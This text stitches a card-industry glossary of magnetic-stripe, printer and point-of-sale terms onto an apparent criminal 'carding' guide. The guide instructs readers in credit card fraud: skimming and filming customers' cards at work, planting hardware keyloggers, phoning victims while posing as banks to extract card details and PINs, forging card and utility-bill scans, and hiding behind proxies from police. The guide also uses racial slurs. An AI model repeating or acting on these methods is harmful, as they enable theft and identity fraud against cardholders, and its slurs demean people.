+EMBOSSING--Raised characters are produced through the use of a male and female die brought together
+by pressure applied above and below a marking surface. Embossing is ideal for variable information data
+cards, strip tags, and identification molding processes.
+EBT (ELECTRONICS BENEFITS TRANSACTION)--Allows governments to implement social aid
+programs such as food stamps through the use of a magnetic-stripe card, which can be accepted at
+merchant locations set up to accept this plan.
+ELECTRONIC DRAFT CAPTURE (EDC)--A system in which the transaction data is captured at the
+merchant location for processing and storage.
+ELECTRONIC FUNDS TRANSFER (EFT)--A paperless transfer of funds initiated from a terminal,
+computer, telephone instrument, or magnetic tape.
+EMBOSS-The process of printing identifying data on a bankcard in the form of raised characters.
+
+ENTERPRISE--An "enterprise" e-commerce solution indicates technology for a large business enterprise.
+This usually involves a number of systems that are required to interface with each other as well as a
+central database management system. The design and management of an enterprise solution can be very
+complex.
+EMULATION--The imitation of a computer system, performed by a combination of hardware and
+software, that allows programs to run between incompatible systems.
+ENCODER--A device used to write data onto magnetic stripe cards.
+EPROM--Read-only, non-volatile, semi-conductor memory that is erasable via ultra violet light and
+reprogrammable.
+EXPANSION BOARD / EXPANSION SLOT--The optional device board that is usually added inside the
+system cabinet at an available expansion slot.
+FACTORING--Also known as laundering. When a merchant submits transactions for another merchant
+that were not conducted at the original merchant's business establishment, this is known as factoring.
+FIRMWARE--A computer program or software stored permanently in PROM or ROM.
+FIELDS--A specific position on each track where data may be written or read.
+FIXED DATA--Data which doesn't change. In Card Template, data remains constant from encoding
+session to encoding session. This means that, until it is modified, each card will encoded with this
+information. In Set-Up/Encode Fields, data is fixed.
+FOIL--Decorative foils are applied to cards with heat. If you have a specific foil in mind, we can apply it
+for you, ID Services has a wide variety to choose from.
+HAND-HELD DATA COLLECTOR--See Portable Data Collector
+
+HARD DISK DRIVE--Enclosed disk drive that contains one or more metallic disks for data storage. A
+hard disk has many times the capacity of a diskette.
+HIGH COERCIVITY--See coercivity.
+HIGH-VOLUME PRINTING--Fast, efficient printing for producing large quantities of cards with
+minimal down time for supplies loading or maintenance.
+HIGH DEFINITION PRINTING™ (HDP™)--The High-Definition Printing process prints full-color
+images onto clear HDP transfer film. The HDP film is then fused to the card through heat and pressure
+via a heated roller. This revolutionary technology enhances card durability and consistently produces the
+best card color available - even on tough-to-print matte-finished cards, proximity cards, and smart cards.
+HIGH SPEED PRINTING--FARGO Card Printer/Encoders are among the fastest desktop card
+printer/encoders in the industry. High-speed printing allows for more efficient card production - saving
+time, money, and resources.
+HOLOGRAM--This security feature prevents the reproduction of ATM/Bank cards and credit cards. ID
+Services has a variety of holograms to choose from or will apply your own custom hologram.
+HOST COMPUTER--A central computer, such as a mainframe computer at a company’s headquarters or
+central office. The central computer in a star network.
+ISO--International Standards Organization specification for magnetic stripe encoding. The FARGO
+encoder supports dual high/low coercivity and tracks 1, 2 and 3.
+ID CARDS--An important record-keeping tool for hospitals, nursing homes, healthcare providers,
+insurance companies and colleges/universities are ID cards. ID Services offers them in four sizes, CR50,
+60, 70 and 80, to fit any standard imprinting or embossing system. ID Services offers a variety of card
+compositions to meet the needs of the specific application. Composite cards are recommended for
+College/University ID’s due to their flexibility and long life span.
+IN-COUNTER SCANNER--A bar code scanner that normally has multiple laser beams emitting from it
+to read bar codes in high-speed environments (i.e. grocery stores). An in-counter scanner is usually
+mounted into a countertop so that products can quickly and easily be passed over the scanner for bar code
+reading.
+
+IMPRINTER--A device supplied to the merchant to produce an image of the embossed characters of the
+bankcard on all copies of sales drafts and credit slips.
+ISSUER--A member that enters into a contractual agreement with MasterCard or Visa to issue
+MasterCard or Visa cards.
+JIS II--Japanese Industrial Standard for magnetic stripe encoding, published and translated into English
+by Japan Standards Association.
+KEYLOCK CARDS--Hotels and resorts all over the world are changing the traditional door locks to
+electronic swipe key cards. Keylock cards are becoming a necessity to keep hotel guests safe. For
+excellent performance, the cards must match the system and the applications. ID Services offers roll-on
+magnetic stripes as well as laminated magnetic stripes in both high energy and low energy coercivity with
+the hotel and/or its logo perfectly printed.
+KEY GENERATOR--Any tool designed to break software copy protection by extracting internally-stored
+keys, which can then be entered into the program to convince it that the user is an authorized purchaser.
+KEY LOGGER--(Keystroke Logger). A program that runs in the background, recording all the
+keystrokes. Once keystrokes are logged, they are hidden in the machine for later retrieval, or shipped raw
+to the attacker. The attacker then peruses them carefully in the hopes of either finding passwords, or
+possibly other useful information that could be used to compromise the system or be used in a social
+engineering attack. For example, a key logger will reveal the contents of all e-mail composed by the user.
+Keylog programs are commonly included in rootkits and RATs (remote administration trojans).
+LCD DISPLAY--The LCD - or Liquid Crystal Display - shows the current status of the printer, and
+changes according to the printer's current mode of operation. LCD communicates an error with text,
+which is easier to interpret than LED lights.
+LOW COERCIVITY--See coercivity.
+LASER SCANNER--A bar code scanner that utilizes laser technology. These scanners emit laser beams
+that read bar codes. Laser scanners have "depth of field" which enables them to read bar codes from short
+
+distances away (6" to a few feet).
+LED (Light Emitting Diode)--A semiconductor light source that emits visible light or invisible infrared
+radiation.
+LOCKABLE HOPPER--Some FARGO Card Printer/Encoders provide a lockable Card Hopper Door.
+This lock is intended to help prevent theft of your blank card stock. This feature is especially helpful if
+using valuable card stock such as preprinted cards, smart cards, or cards with built-in security features
+such as holograms.
+MAGSTRIPE STRIPE--The magnetically encoded stripe on the bankcard plastic that contains
+information pertinent to the cardholder account. The physical and magnetic characteristics of the
+magnetic stripe are specified in ISO Standards 7810, 7811, and 7813.
+MAGNETIC STRIPE READER--A device that reads information recorded on the magnetic stripe of a
+card.
+MEMBER--An institution that participates in the programs offered by MasterCard International
+Incorporated.
+MERCHANT--A retailer, or any other person, firm, or corporation that (pursuant to a merchant
+agreement) agrees to accept credit cards, debit cards, or both, when properly presented.
+MAS (Merchant Accounting System)--The Vital back-end system that handles settlement, interchange
+and billing.
+
+MERCHANT BANK--A bank that has entered into an agreement with a merchant to accept deposits
+generated by bankcard transactions; also called the acquirer or acquiring bank.
+MCC (MERCHANT CATEGORY CODE)--Four-digit classification codes used in the warning bulletin,
+authorization, clearing, and settlement systems to identify the type of merchant business in various stages
+of transaction processing.
+MMS (MERCHANT MANAGEMENT SYSTEM)--The Vital front-end system that handles point of sale
+functions such as terminal types, cut-off times, etc.
+MOTO (MAIL ORDER/TELEPHONE ORDER)--A transaction initiated by mail or telephone to be
+debited or credited to a bankcard account.
+MAGNETIC STRIPE--The black stripe found on the back of most credit cards and many other types of
+identification cards and drivers licenses. Used to encode and read data, usually identifying the owner of
+the card.
+MAGNETIC (“MAG”) STRIPE--Mag Stripe refers to the black or brown magnetic stripe on a card. The
+stripe is made of magnetic particles of resin. The resin particle material determines the coercivity of the
+stripe; the higher the coercivity, the harder it is to encode -- and erase -- information from the stripe.
+Magnetic stripes are often used in applications for access control, time and attendance, lunch programs,
+library cards, and more.
+MAGNETIC STRIPES--Offered in five different sizes and are available in both low coercivity (300
+oersteds) and high coercivity (2750 (USA), or 4000 (European) oersteds.)
+· 1/8" Covers one track (HEM only)
+· 5/16" Covers two tracks
+
+· 6/16" Covers three tracks (3/8")
+· 7/16" Covers three tracks
+· 8/16" Covers three and one half tracks (1/2")
+· 9/16" Covers four tracks (super stripe)
+· We can apply roll-on magnetic stripes as well as flush laminated magnetic stripes.
+For additional security ID Services offers holo-magnetic stripes. The stripes are custom made with your
+company name appearing in the stripe. Multiple magnetic stripes can be applied to each card.
+MAGNETIC STRIPE READER--See Credit Card Reader
+MASTER REGISTER--A cash register that acts as the central register or "file server" in a multiple
+register environment. The master register normally controls "slave" registers that are networked and cable
+to it.
+MEGABYTE--A unit of measure that consists of 1,014 bytes.
+MICROCOMPUTER (Personal Computer)--A small. low cost computer originally designed for
+individual users. Recently, microcomputers have become powerful tools for many businesses that, when
+networked together, have replace minicomputers and in some cases mainframes and information tools.
+MICRO-PRINTING--Very small text printed into the plastic card and generally look like thin lines to the
+naked eye. The text is printed at 9600 dpi (dots per inch) and require a magnifying glass to view the
+micro-printed text. Desktop card printers print at 300 dpi and can not reproduce micro-printing making
+micro-printing a very handy feature when checking for counterfeit cards.
+MICROPROCESSOR--Integrated circuit chip that monitors, controls and executes the machine language
+instructions.
+
+MICR READER--MICR is an acronym for Magnetic Ink Character Recognition. MICR Readers are
+normally used to read the encoded information within the ink on a check.
+MODEM (Modulator - Demodulator)--A device used to convert serial digital data for transmission over a
+telephone channel, or to reconvert the transmitted signal to serial digital data for acceptance by a
+receiving terminal.
+MONOCHROME MONITOR--A monitor that displays characters in only one color, such as amber or
+green.
+MULTI-USER--Multi-user systems consist of two or more computers that are connected together and
+that share data and peripherals. A multi-user system includes a host computer (file server) and one or
+more stations. All stations share the same hard disk and may share other devices such as printers.
+MTBF (Mean Time Between Failures)--The average time between failures of a particular device based on
+statistical or anticipated experience.
+NETWORK--A communications system connecting two or more computers and their peripheral devices.
+NETWORK CARD--An expansion card that is installed in an available slot in a computer so that it may
+connect and communicate to another computer.
+OPERATING SYSTEM--System that consists of several programs that help the computer manage its
+own resources, such as manipulating files, running programs and controlling the keyboard and screen.
+OUTPUT STACKER--The Output Stacker stores printed cards in a first-in/first-out order. This feature
+makes it easy to keep printed cards in a specific order for faster issuance or to print serialized cards.
+OVERSIZED CARDS--Oversized cards are used for more efficient visual identification and are available
+in many non-standard sizes. The most popular sizes are CR-90 (3.63" x 2.37"/92mm x 60mm) and CR-
+100 (3.88" x 2.63"/98.5mm x 67mm).
+OVERLAMINATE--Protective clear or holographic material designed to offer advanced card security
+
+and durability. Two types are available from FARGO: Thermal Transfer Overlaminate is a .25 mil thick
+material that enhances card security and durability. PolyGuard Overlaminate is available in a 1 mil and .6
+mil thick material and provides extraordinary protection for applications that require highly durable cards.
+OVERLAY PANEL--The clear overlay panel (O) is provided on dye-sublimation print ribbons. This
+panel is automatically applied to printed cards and helps prevent images from premature wear or UV
+fading. All dye-sublimation printed images must have either this overlay panel or an overlaminate applied
+to protect them.
+OVER-THE-EDGE--Refers to the maximum printable area on a card. Printer/Encoders with over-the-
+edge printing capability can print past the edge of a card resulting in printed cards with absolutely no
+border.
+PARALLEL TRANSMISSION--Transmission mode that sends a number of bits simultaneously over
+separate lines. Usually unidirectional.
+PERIPHERAL DEVICE--Hardware that is outside of the system unit, such as a disk drive, printer, cash
+drawer or scanner.
+POLLING--A means of controlling devices on multi-point line. Usually utilized to send/receive
+information via modem from remote computers to a central computer.
+POLYGUARD™--A card overlaminate available in 1 mil and .6 mil thicknesses that provides
+extraordinary card protection; ideal for harsh or more secure environments. Available as clear or with
+embedded holographic-type security images.
+POS (Point-of-Sale)--Term normally used to describe cash register systems that record transactions or the
+area of "checkout" in a retail store.
+PIN NUMBERS--This security feature will activate usage of the card. Once the numbers have been
+supplied from our customers, ID Services can apply them to the customer cards.
+PINPAD--A "pin pad" is a small keyboard that normally contains numeric keys. PIN is an acronym for
+personal identification number which is normally entered into the keyboard "pad" to verify account
+information for a transaction (i.e. similar to an automated teller machine).
+
+PORTABLE DATA COLLECTOR--A hand-held computer that can be used as a stand alone portable
+unit for point-of-sale, inventory, receiving and other applications. A portable data collector is normally a
+temporary storage device that gathers information and downloads data into a main or central computer.
+PROGRAMMABLE KEYBOARD--A keyboard that is capable of being configured and programmed in a
+variety of ways. Programmable keyboards allow keys to represent special departments, functions,
+product, etc.
+PROJECTION SCANNER--A type of bar code reader that is normally placed vertically, and that projects
+laser beams horizontally to scan bar codes. Often used when high performance and speed to reading bar
+codes is critical.
+PROTOCOLS--A set of rules for the exchange of information, such as those used for successful data
+transmission.
+PROXIMITY (“PROX”) CARD--Proximity cards allow access and tracking utilizing contactless
+technology (usually by communicating through a built-in antenna).
+PROX CARD ENCODER--The prox card encoder uses a HID ProxPoint® Plus reader mounted on the e-
+card docking station inside the printer/encoder. The ProxPoint is a "read only" device producing a
+Wiegand signal that is converted to RS-232 using a Cypress Computer Systems CVT-2232. Application
+programs can read information from HID prox cards via a RS-232 signal through a dedicated DB-9 port
+on the outside of the printer labeled "Prox."
+PVC (POLYVINYLCHLORIDE)--These cards are manufactured for mechanical style embossing and to
+be our least expensive card option. They are available in 23 different colors and three different card
+finishes. Heat distortion occurs at 130°F and the cards will flex approximately 2,500 flex cycles.
+Estimated normal card life: 18 months.
+PDF (PORTABLE DOCUMENT FORMAT--Adobe's file format is the de facto standard for electronic
+document distribution. It is the preferred means of distributing documents online because it preserves
+fonts, formatting, colors and graphics regardless of the application or platform used to create it. The
+Adobe Acrobat Reader, required to read PDF files, is available free from the Adobe web site.
+PIN PERSONAL IDENTIFICATION NUMBER)--A four-to-12 character secret code that allows an
+issuer to positively authenticate the cardholder for the purpose of approving an ATM or terminal
+transaction occurring at a point-of-interaction device.
+
+POTS (PLAIN OLD TELEPHONE SERVICE)--The standard analog telephone service with no
+enhancements like call waiting, etc.
+PURCHASE CARD--The Purchase card is issued to corporations, businesses and governments. It
+provides control over daily and monthly spending limits, total credit limits, and where the card may be
+used. It also reduces the administrative cost associated with authorizing, tracking, paying, and reconciling
+those purchases. Many employees may be issued the same card number.
+RAM (Random Access Memory)--Temporary storage that holds the program and data the CPU is
+processing.
+RESIN THERMAL TRANSFER--Resin Thermal Transfer is the process used to print sharp black text
+and crisp bar codes that can be read by both infra-red and visible-light bar code scanners. It is also the
+process used to print ultra-fast, economical one-color cards. Like dye-sublimation, this process uses a
+thermal Printhead to transfer color from the ribbon roll to the card. The difference, however, is that solid
+dots of color are transferred in the form of a resin-based ink which fuses to the surface of the card when
+heated. This produces very durable, single-color images.
+SCALE--A scale is a peripheral device used to record the weight of an item and transmit the amount to a
+computer for processing.
+SCRATCH-OFF PANELS--Applied through hot stamping or silk screening. Typically they are used to
+cover pin numbers on pre-paid phone cards.
+SERIAL TRANSMISSION--Transmission mode that sends data one bit at a time. In most cases, in
+personal computers, serial data is passed through as RS232 serial interface port.
+SIGNATURE CAPTURE--A peripheral device that electronically captures an individual’s signature for
+customer identification and transaction applications.
+SLAVE REGISTER--A cash register that is driven by a "master" register in a multiple register
+environment.
+SMART CARD--A smart card contains a "chip" with memory and is typically used to hold customer
+account information and a "balance" of money similar to a checking account. The card is inserted into a
+device that can read and write to it updating information appropriately.
+
+SMART CARD--Smart cards have an embedded computer circuit that contains either a memory chip or a
+microprocessor chip. There are several types of smart cards: Memory, Contact, Contactless, Hybrid
+(Twin), Combi (Dual Interface), Proximity and Vicinity.
+SMARTGUARD™--SmartGuard is a printer security option that uses a custom access card and a built-in
+reader to restrict printer access. With this feature, only those with a valid access card can print cards. This
+makes both your printed cards and your overall system more secure.
+SMARTLOAD™--SmartLoad is an exclusive FARGO technology used in CardJet Card and Ink
+Cartridges to advise you on the status of your CardJet supplies. In CardJet Ink Cartridges, SmartLoad
+technology reports the number of prints remaining in the cartridge and alerts you when ink is low or out.
+In CardJet Card Cartridges, SmartLoad technology tells you to install a new cartridge when the card
+supply runs out.
+SMARTLOAD CARD CARTIDGE--Cartridge that is pre-loaded with CardJet Cards at the factory. They
+snap into the back of the printer in just seconds. SmartLoad technology inside the cartridges alerts you to
+install a new cartridge when the card supply runs out.
+SMARTLOAD INK CARTIDGE--CardJet Ink Cartridges are available with both full-color and black
+(used for infrared bar codes only) inkjet inks. Cartridges snap into the printer just like the cartridges used
+in other familiar office or home inkjet printers. SmartLoad technology inside the cartridges reports the
+number of prints remaining in the cartridge and alerts you when ink is low or out.
+SMARTSHIELD™--This option allows the printer/encoder to print custom, reflective security images on
+the card that fluoresce under a black or UV light source.
+SOLENOID--Solenoids are commonly used in "dumb" cash drawers and incorporate a cable connected
+trigger which releases the drawer. Cash drawers with solenoids are interfaced to receipt printers that
+"drive" them. Solenoids have different voltages and are integrated into the cash drawer dependent on the
+printer they are interfaced to.
+STANDARD CARDS--The standard card size is CR-80. CR-80 dimensions are 3.375" x 2.125" (85.6mm
+x 54mm).
+THERMAL TRANSFER--Thermal transfer is a printing technology method in which printers use regular
+paper and a heat sensitive ribbon. The ribbon deposits a coating of dark material on the paper when
+exposed to intense heat. Thermal transfer printers produce a more durable label that won’t fade as quickly
+as direct thermal labels and are often used when a label needs to endure longer than a year.
+
+THERMAL TRANSFER OVERLAMINATE--A card overlaminate available in a .25 mil thickness that
+increases card security and durability; often used for moderate durability applications or when additional
+security (such as holographic images) are needed.
+TILL--The paper money and currency tray that holds money in a cash drawer. Tills are usually available
+in 4 or 5 till versions, available with lock and cover and are removable.
+TRACK--One of up to three portions of a magnetic stripe where data can be written.
+TRACK 1--Track one is a "track" of information on a credit card that has a 79 character alphanumeric
+field for information. Normally a credit card number, expiration date and customer name are contained on
+track 1.
+TRACK 2--Track two is a "track" of information on a credit card that has a 40 character field for
+information. Normally a credit cad number and expiration date are contained on track 2.
+TRACK3--Track three is a "track" of information on a credit card that has 107 character field for
+alphanumeric information. Normally a credit card number, expiration date and room for additional
+information are available on track 3.
+UNIX--UNIX is a terminal based operation system in which "dumb" terminals are communicating back
+to a "smart" processing unit or host.
+UPS--An acronym for uninterruptible power source. A UPS is primarily used as a back up power source
+for computers and computer networks to insure on-going operation in the event of a power failure.
+Sophisticated units also have power conditioning and power monitoring features.
+UV INKS--most commonly used to put hidden graphics and text on a plastic card. The inks are invisible
+until the card is subjected to a certain colored light (for instance, when placing a California drivers license
+under a black light the image of the California flag will become visible in green and orange.) UV inks are
+used as an aid in detecting counterfeit cards. They come in a variety of colors and can react to different
+colored lights. Desktop card printers are unable to print UV ink.
+VARIABLE DATA--is information which changes with each encoding session or on a card-by-card
+basis.
+
+VERTICAL SCANNER--See Projection Scanner.
+WAND--A pen-shaped bar code scanner that emits a beam from the end or tip of the wand. Wands are
+older, bar code reading technology but inexpensive and still widely used where speed and performance
+are not crucial.
+WEDGE--A wedge decodes "read" data (i.e. bar codes, credit cards) and communicates that information
+through a keyboard port on a computer. The keyboard plugs into the wedge and the wedge device plugs
+into the computer where the keyboard was. Sophisticated wedges can accept a few different peripheral
+devices. Also See Decode
+Carding
+This is a creepcentral publication
+Carding: Carding: Online, Instore, Going through vendors and advice, Phishing for change of billing
+addresses
+Including drops and what you need to know;Huge guide written by me
+Carding: Carding: Online, Instore, Going through vendors and advice, Phishing for change of billing
+addresses
+Including drops and what you need to know;Huge guide written by me
+kay major updates done to this carding yext, it will cover the basics of most carding knowledge. Going
+into absolutely everything would mean having to go onto ID theft and fake IDs which can be classed as 2
+different categories of their own.
+kay major updates done to this carding text, it will cover the basics of most carding knowledge. Going
+into absolutely everything would mean having to go onto ID theft and fake IDs which can be classed as 2
+different categories of their own.
+What I'm going to cover:
+Online Carding
+- A quick overview of what online carding is
+- SOCKS and why we use them
+- Finding a cardable site and what cardable means
+- Carding "non cardable websites" with fake CC scans and other fake documents
+Carding while on the job
+- Getting CC, CVV, CVV2 through use of mobiles
+- Skimming whilst on the job
+- Using carbonless receipts to get details (pretty outdated method)
+Trashing
+
+- Trashing for receipts and credit reports (pretty outdated although still works)
+Phishing over the phone
+- Phishing over the phone for details
+Keylogging for CVV2s
+- Hardware keylogging
+Carding Instore
+- What instore carding is (very brief)
+- How it's done
+- How to act and present yourself instore
+Carding over the phone
+- Carding over the phone
+IRC
+- Services provided in IRC
+- Advantages to using IRC for info
+- Disadvantages
+- How to find carding channels (Will not go too much into this as there are secrets between fellow carders
+which we like people interested enough to find out for themselves)
+- Vendors and how to approach them
+- How to rip in IRC (EVERY vendor, reliable or not has ripped some n00b who acted like they knew
+what they were doing)
+::::WU BUG BULLSHIT and how to rip n00bs and gain more::::
+Phishing for Change of billing
+- What COB is and why it's useful
+- Use through phishing pages
+- Use through keylogging
+Drops and what you need to know about them
+- Drops and what you need to know about them
+What carding is
+Carding summed up quickly is the act of obtaining someone's credit card information, from the CC#,
+CVV, CVV2, CVN, and the billing address, along with the expiry date and name of the person the card
+belongs to along with a signature.
+Online Carding
+Online carding is the purchasing of goods done over the internet with the CVV2.
+Now for you n00bies you're probably wondering what a CVV2 is, it's simply just the database of basic
+info for the card such as the card type (e.g. Mastercard) First and last name, address and post code, phone
+number of the card owner, the expiry date (and start date if it's a debit card or prepaid CC), the actual CC
+number and the CVC (card verification code, which is the 3 digits on the back of the card).
+This is the format you usually get them in when you buy off IRC:
+:::MC ::: Mr Nigerian Mugu ::: 1234567890123456 ::: 09|11 ::: 01/15 ::: 123 ::: 123 fake street,
+fakeville, ::: Fake City ::: DE24 TRH ::: 01234-567890 :::
+SOCKS and why we use them
+Now with ANY fraud at all you have to take precautions so you don't make it easy for anyone to catch
+you in your wrong doings. As usual I swear against TOR for carding/scammin because most nodes are
+blacklisted by websites and because TOR cycles through various different proxies; and even if you
+configure it to go straight through an exit node of your choice it's still not worth it. You can use JAP but
+
+make sure you're using some constant sock proxies from the same city, town or area that the card is from;
+also go wardriving and use a VPN (don't trust anyone off IRC with these, you'll have to do some
+searching around yourself for a highly trusted one and one which won't comply with LE).
+You can get good SOCKS from anyproxy.net (people are selling accounts for the site in IRC all the time),
+that's the best place but even I ended up losing the account eventually (unknowingly I was sharing it with
+some Nigerian dude who became selfish).
+So we use SOCKS because they stay constant. But don't let that get your guard down, you want FRESH
+proxies everytime you card.
+Finding a cardable site and what cardable means
+Basically a cardable site holds these characteristics and what you should be looking for to determine an
+easily "cardable" website:
+- The top one you need to look for on the site's TOS is that they send to any address and not just the one
+registered on the card (although you can easily get around this if they don't, with a COB, photoshopped
+verification (will go into detail later) or some social engineering over the phone).
+- The next important to look for is if they have a visa verification code or mastercard secure code (most of
+the time if you ask your vendor they'll include them in your CVV2 details textfile), if they do have one of
+these you have to put in and you don't have them then don't waste your time
+- If they ship internationally (for obvious reasons, but you can just stick to local websites and order to
+your local drop)
+- If they leave packages at the door when no one's in, or around the back in a safe area (I know of one site
+in the UK that has all these qualities including this one, it is perfect for carding clothes)
+- Also you can't forget to see what other security checks they need to do (if they need to call you up to
+verify or want a utility bill, passport or a scan of the actual CC)
+It is hard to find websites online now that have most of these qualities, therefore we have to use COBs
+and photoshop to help us along the way, which is what I'll go into now.
+Carding "non cardable websites" with fake CC scans and other fake documents
+Okay so say you come across a site that will deliver to another house not registered on the card, but they
+want verificaton either through phone or scans of a utility bill, credit card or passport.
+For this you'll want to get a pay as you go deal for a cheap shitty mobile all in fake details (say a nokia
+3210, brick LMAO!), or you can use spoofcard.com to your advantage to help you. Hell if the person's
+details you're using is local to you and you're daring then go to their home and beige box from there; it'd
+be very convincing.
+If they speak to you over the phone have all details in your mind about the item you're carding, have some
+bullshit story if you're having it sent to a diff address such as a family member's birthday and you need it
+there as quick as possible as it's a last minute thing, or some shit like that. If you're carding multiple sites
+at the same time it's easy to get them mixed up, so make sure who it is calling you 1st.
+For CC scans and how to do them check the attachments at the end of this file, they explain so much
+better than I could. How you use them is once you've made them like the tuts have said to do, you then tilt
+them a little bit so it does actually look like a scan. To make it even more believable put some paper in the
+scanner (dark shade if you must), scan it and open in photoshop and then put the shopped CC scan of the
+front onto it and then do the same with the back, then send the scans to them via e-mail or post. Same
+goes for utility bills (can be got through trashing or your own, and then edited in PS).
+Do not use the same designs when making your CC scans, otherwise it will become too obvious. To give
+you a head start on mastercards (what I recommend for n00bs to go for) I'm giving you a globe hologram
+image so you won't have to buy them in IRC; unfortunately all of my visa hologram pics are shit, but I'm
+working on getting a good one soon.
+
+VISA hologram pic coming soon!
+Carding whilst on the job
+Getting CC, CVV, CVV2 through use of mobiles
+Believe it or not giving your information out to anyone anywhere is not a wise choice, you can not trust
+anyone in this day and age. Yes there are carders working on the inside in places where there are a lot of
+people around flashing off their plastic cash and using them freely without a care in the world. The most
+common of places for a carder to work at are brand label clothing stores such as Limey's, Charlie Brown's
+and all the other trendy shops.
+Ever noticed when yourself or someone else has paid at the desk with a debit card or credit card that they
+bring out a keypad from under the desk, then put your card into it and have the buyer input the pin? Think
+again when they take your credit card and go under the desk with it to get the keypad, they are doing
+more than just that; just because they're not taking the card and running off with it does not mean they're
+not stealing your information. A friend of my dad used to card and work in a clothing store, he used to
+have a piece of play doh stuck under the desk and he used to press the card onto the piece of play doh,
+unfortunately he began doing it too much and because he'd gotten away with it so many times he became
+careless and got caught out by a co worker and from what I know he is still doing time. The moral is, be
+careful with the play doh method. The unfortunate thing is you can only get the full info of 2 cards at the
+max, and you don't know exactly if you're pressing over the info of another card already put on to the play
+doh. Also you can't get the CVC through this method, I was just giving a classic example from the olden
+days.
+But there is a new wonderful invention called cameras, video recording, and mobile phones and they are
+even all working on the same thing. It's best to test it out 1st and have a camera on your phone that is at
+least over 2 megapixel and allows long enough video recording times. The phone is set to video record
+and on a lighting if needed, and taped underneath the desk for you to record both sides of the card for all
+the information you need, as well as being quick you can get a lot more than 2 on, depending on how long
+each recording lasts, you may need to start more than one recording.
+You need good reason to be going under the desk to get the chip and pin machine, so make the desk look
+cluttered up and put shit in the way of everything, such as coat hangers and various other items; or you
+could just flat out bullshit the customer and say that the chip and pin machine on the desk isn't working so
+you need to get the other one, take their card and then go under searching the desk and quickly show it to
+the camera phone and then get the chip and pin machine and put the card in it and then hand to the
+customer to put in their pin as normal, unaware you have a CVV2 to later use when shopping online.
+Skimming whilst on the job
+For skimming you'll want a mini portable MSR500M reader that can be fitted on your waistline belt or of
+course once again under the desk, if you're a cashier. But you'll also want a MSR206 writer if you plan on
+writing the tracks to an embossed CR-80 piece of plastic later (you can make these yourself but
+embossers are expensive and it's an expensive procedure, so wait a while until you do that yourself and
+buy them from IRC (be careful, people like to rip with plastics, or you'll get shit quality if you don't watch
+out).
+If you plan to just sell the dumps on IRC then that's fine, but you'll still need the PIN as well, so if you're
+a waiter you can get a cheeky peek at them putting their pin into the chip and pin device while you keep
+hold of it slightly (have them put the pin in while they're sat down and you're standing up). It's much
+easier to skim in a restaurant rather than clothing retail, as you don't have to think it out and set it up as
+much. You can keep the MSR500M in your front pocket of the uniform you're wearing and pretend to be
+giving the card a clean on the sleeve (bullshit and say the device won't read it), while really you're giving
+it a swipe into your reader. This way the person doesn't even get suspicious because you don't take their
+card out of sight with them. I guess you could do that technique with clothing retail too when you get
+their card in your dirty little hands, but peeking for the PIN is harder or you'll have to have a friend
+shoulder surf for it (or if they're on the next register have them use a sony cyber shot c902 camera phone
+
+and pretend to have them talking on the phone while really they're recording the person next to them
+putting in their PIN; cybershots are really inconspicuous looking with their cameras and VERY clear
+[5mpixel]).
+I'll go into detail what to do with the dumps you have later in the instore carding section.
+Using carbonless receipts to get details (pretty outdated method)
+If the store you work at hasn't gone carbonless on the transactions information then you can get most of
+the info from the receipt you get a copy of for yourself and note down the pin on this as well when/if you
+get it.
+Trashing
+Trashing for receipts and credit reports (pretty outdated although still works)
+Ever heard the expression "Another man's trash is another man's gold"? That's exactly what this is. You'd
+be surprised how many people haven't heard of a paper shredder or bonfire. They just dump their
+financial records containing SSN's/NI, full name, address, bank, credit card number, CVV, CVV2 etc. All
+on forms people couldn't be bothered to dispose of properly because they thought they were JUST old
+records. Again carders wok on the inside again for when they want to do trashing, a lot of janitors wear
+rags but you'd be surprised how secretly rich most of them are (along with the other shit they steal from
+work as well). But also from this if there is not enough info for you on the forms then there is definitely
+the phone number of the mark on the form that they've scrapped; almost always, and if not then there is
+enough info on their to look them up in the phone directory. Then of course you use social engineering
+skills over the phone to get the extra info that you need. If you know of a store that is not carbonless, then
+go trashing in the bins at the back of the store for the receipts with the credit card details on it.
+Phishing over the phone
+Phishing over the phone for details
+Ever had telemarketers ask for your credit card info over the phone? (this is if you haven't already hung
+up by just hearing a nigger or paki on the phone) chances are they're a carder. Believe it or not there are
+people actually stupid enough to fall for these obvious scams. Even more people fall for this if they
+believe that the caller is from the credit card company itself or part of the secret service or credit fraud
+investigations; the FBI, CIA and police have nothing at all to do with credit card fraud believe it or not. If
+you sound professional or part of an important group such as investigations then people are more likely to
+comply with you if they believe that their card has been used for credit fraud purposes and have to give
+their credit card info and billing address for verification. The best time to call up the mark is when they
+are at work as it'll take them by surprise and they'll be wanting to get it sorted asap so that they can get
+back to work. Also if it's "serious" then the secret service don't wait for you to finish work before they
+question you. Play along well to the part you're pretending to be. Some social engineering skills are
+required and you must gain the experience of lying to people yourself. Before calling up the person find
+out as much information about them as you can.
+If you've stolen a CC from someone personally you can call them up pretending to be their bank and tell
+them there has been some suspicious charges made to the credit card from places such as South Africa,
+Nigeria, Turkey, Russia; places like that, get them to confirm their details (milk as much as you want out
+of them, ask them bullshit security questions such as their mother's maiden name, address, etc; you may
+as well, it'll make it easier to get a COB for you to use).
+You can also get their PIN out of them if you want as well by either straight out asking them to confirm
+it, or be crafty and after you've told them to verify their PIN you're putting them through to a different
+department; then play some cheesy music down the phone for a few mins, have a female voice recording
+(use AV vocie changer) asking them to input their PIN on their dialpad (this won't be as suspicious); get
+these recorded so they can be decoded with DTMF decoding hardware/software later (although it's
+expensive). Guessing DTMF tones is pretty easy too, but you need to know what each tone sounds like,
+it's preferred to use decoding software to ensure you have it correct.
+If you try hard enough you can get full info about anyone over the phone (I suggest using spoofcard for
+
+this).
+Keylogging for CVV2s
+Hardware keylogging
+First of all it's best if you use hardware keyloggers here that you put into the keyboard of a computer
+belonging to an area where a lot of people are going online a lot and logging into e-mails, ebays, paypals
+etc, pretty much giving you enough info for you to go searching through if you get in their e-mails, or
+maybe you're lucky enough to get someone who is buying something online anyway. Get the keyloggers
+from here:
+Code:
+http://tyner.com/datalogger/keykatcher.htm
+And come back within 2 days time or so and collect the keylogger after doing some browsing yourself (as
+to not look suspicious just coming in and then leaving a few seconds later).
+Or of course you could set one up in a business and do the classic call in and do some social engineering
+from the credit card company or secret service and have them go to the bank online and have them log in
+to verify, or maybe even have them log in to a fake bank online made by yourself that will collect
+anyone's info who logs in on it.
+Carding Instore
+Instore carding is the act of skimming a credit card and writing the dumps and track1+2 to a CR-80 piece
+of plastic and then either cashing out at the ATM or shopping for goods instore, as long as you have the
+PIN as well through whatever method you choose to use.
